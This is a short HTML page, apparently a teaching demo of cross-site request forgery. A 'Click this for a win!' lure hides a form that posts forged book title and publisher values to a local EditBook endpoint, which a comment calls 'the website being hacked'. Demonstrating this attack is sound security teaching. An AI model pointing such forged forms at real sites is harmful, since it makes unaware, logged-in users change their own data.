﻿<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <title></title>
</head>
<body>

    <h1>Click this for a win!</h1>

    <!-- form has a redirect to the website being hacked -->
    <form action="https://localhost:5001/Home/EditBook" method="post">
        <input type="hidden" value="bad book title" name="title" />
        <input type="hidden" value="bad publisher" name="publisher" />
        <input type="submit" value="Click Now!" />
    </form>

</body>
</html>